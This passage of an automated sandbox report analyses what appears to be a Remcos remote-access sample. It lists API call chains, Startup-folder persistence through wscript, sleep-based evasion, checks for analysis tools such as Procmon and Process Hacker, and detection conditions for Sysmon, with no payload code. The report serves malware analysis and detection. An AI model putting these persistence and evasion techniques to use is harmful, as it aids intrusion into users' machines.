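On a live host the same two conditions map directly onto Sysmon event ID 1 (or Windows 4688 with command-line auditing): wscript.exe or cscript.exe whose command line names the Startup folder, and a child of wscript.exe whose image lives under the user profile. The mutex name Rmc-MKYDDH is only useful as a sample-specific indicator, since Remcos builds set it per campaign.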
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BD5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00745376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B73187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0040E54F Sleep,ExitProcess | 2_2_0040E54F
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0040E54F Sleep,ExitProcess | 5_2_0040E54F
Source: Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: Milburr.exe, 00000004.00000002.2268951587.0000000000EFD000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281035123.00000000014AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
Source: Milburr.exe, 00000002.00000002.4574070147.0000000001213000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEP
Source: l1QC9H0SNR.exe, 00000000.00000002.2131174618.0000000000F88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEORG
Source: Milburr.exe, 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXERG
Source: l1QC9H0SNR.exe, 00000000.00000003.2120110912.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000002.2131421488.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000003.2120047789.0000000001027000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEX
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 2_2_004198C2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 5_2_004198C2
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Window / User API: threadDelayed 4067
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Window / User API: threadDelayed 5424
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Window / User API: foregroundWindowGot 1747
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-105377
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | API coverage: 6.1 %
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | API coverage: 2.0 %
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 1136 | Thread sleep count: 181 > 30
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 1136 | Thread sleep time: -90500s >= -30000s
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128 | Thread sleep count: 4067 > 30
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128 | Thread sleep time: -12201000s >= -30000s
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128 | Thread sleep count: 5424 > 30
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe TID: 2128 | Thread sleep time: -16272000s >= -30000s
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00BB445A
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBC6D1 FindFirstFileW,FindClose | 0_2_00BBC6D1
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00BBC75C
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00BBEF95
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00BBF0F2
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00BBF3F3
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00BB37EF
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00BB3B12
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00BBBCBC
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 2_2_0040B335
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose | 2_2_0041B42F
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 2_2_0040B53A
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0044D5E9 FindFirstFileExA | 2_2_0044D5E9
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8 | 2_2_004089A9
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00406AC2 FindFirstFileW,FindNextFileW | 2_2_00406AC2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8 | 2_2_00407A8C
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW | 2_2_00418C69
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose | 2_2_00408DA7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072445A GetFileAttributesW,FindFirstFileW,FindClose | 2_2_0072445A
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072C6D1 FindFirstFileW,FindClose | 2_2_0072C6D1
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 2_2_0072C75C
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 2_2_0072EF95
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 2_2_0072F0F2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 2_2_0072F3F3
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_007237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 2_2_007237EF
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00723B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 2_2_00723B12
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0072BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 2_2_0072BCBC
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 5_2_0040B335
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose | 5_2_0041B42F
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 5_2_0040B53A
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0044D5E9 FindFirstFileExA | 5_2_0044D5E9
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8 | 5_2_004089A9
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00406AC2 FindFirstFileW,FindNextFileW | 5_2_00406AC2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8 | 5_2_00407A8C
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW | 5_2_00418C69
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose | 5_2_00408DA7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 2_2_00406F06
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00B549A0
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | API call chain: ExitProcess graph end node | graph_0-107554
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | API call chain: ExitProcess graph end node | graph_0-104582
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | API call chain: ExitProcess graph end node | graph_0-104654
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BC3F09 BlockInput | 0_2_00BC3F09
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00B53B3A
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B85A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer | 0_2_00B85A7C
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00CB2A60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect | 0_2_00CB2A60
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_0100950E mov eax, dword ptr fs:[00000030h] | 0_2_0100950E
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_01009520 mov eax, dword ptr fs:[00000030h] | 0_2_01009520
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_0100AB40 mov eax, dword ptr fs:[00000030h] | 0_2_0100AB40
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_0100ABA0 mov eax, dword ptr fs:[00000030h] | 0_2_0100ABA0
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00442554 mov eax, dword ptr fs:[00000030h] | 2_2_00442554
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_01147500 mov eax, dword ptr fs:[00000030h] | 2_2_01147500
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_01147560 mov eax, dword ptr fs:[00000030h] | 2_2_01147560
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_01145ECE mov eax, dword ptr fs:[00000030h] | 2_2_01145ECE
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_01145EE0 mov eax, dword ptr fs:[00000030h] | 2_2_01145EE0
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 4_2_00F6A9F8 mov eax, dword ptr fs:[00000030h] | 4_2_00F6A9F8
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 4_2_00F6AA58 mov eax, dword ptr fs:[00000030h] | 4_2_00F6AA58
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 4_2_00F693D8 mov eax, dword ptr fs:[00000030h] | 4_2_00F693D8
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 4_2_00F693C6 mov eax, dword ptr fs:[00000030h] | 4_2_00F693C6
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00442554 mov eax, dword ptr fs:[00000030h] | 5_2_00442554
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0151A1B8 mov eax, dword ptr fs:[00000030h] | 5_2_0151A1B8
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0151A218 mov eax, dword ptr fs:[00000030h] | 5_2_0151A218
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_01518B98 mov eax, dword ptr fs:[00000030h] | 5_2_01518B98
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_01518B86 mov eax, dword ptr fs:[00000030h] | 5_2_01518B86
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation | 0_2_00BA80A9
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B7A124 SetUnhandledExceptionFilter | 0_2_00B7A124
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00B7A155
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_00434168
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_0043A65D
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_00433B44
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00433CD7 SetUnhandledExceptionFilter | 2_2_00433CD7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_006EA155
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006EA124 SetUnhandledExceptionFilter | 2_2_006EA124
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_00434168
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_0043A65D
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_00433B44
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00433CD7 SetUnhandledExceptionFilter | 5_2_00433CD7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 2_2_00410F36
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 5_2_00410F36
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA87B1 LogonUserW | 0_2_00BA87B1
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00B53B3A
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00B548D7
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BB4C27 mouse_event | 0_2_00BB4C27
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00BA7CAF
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_00BA874B
Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp, Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmp, Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Milburr.exe, 00000002.00000002.4574103580.0000000001238000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: l1QC9H0SNR.exe, Milburr.exe | Binary or memory string: Shell_TrayWnd
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\r
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0.26:3678
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0.26
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\8
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDH\rA'
Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: Milburr.exe, 00000002.00000002.4574103580.0000000001238000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B7862B cpuid | 0_2_00B7862B
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 2_2_004470AE
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 2_2_004510BA
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 2_2_004511E3
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 2_2_004512EA
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 2_2_004513B7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoW | 2_2_00447597
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: GetLocaleInfoA | 2_2_0040E679
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 2_2_00450A7F
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 2_2_00450CF7
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 2_2_00450D42
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: EnumSystemLocalesW | 2_2_00450DDD
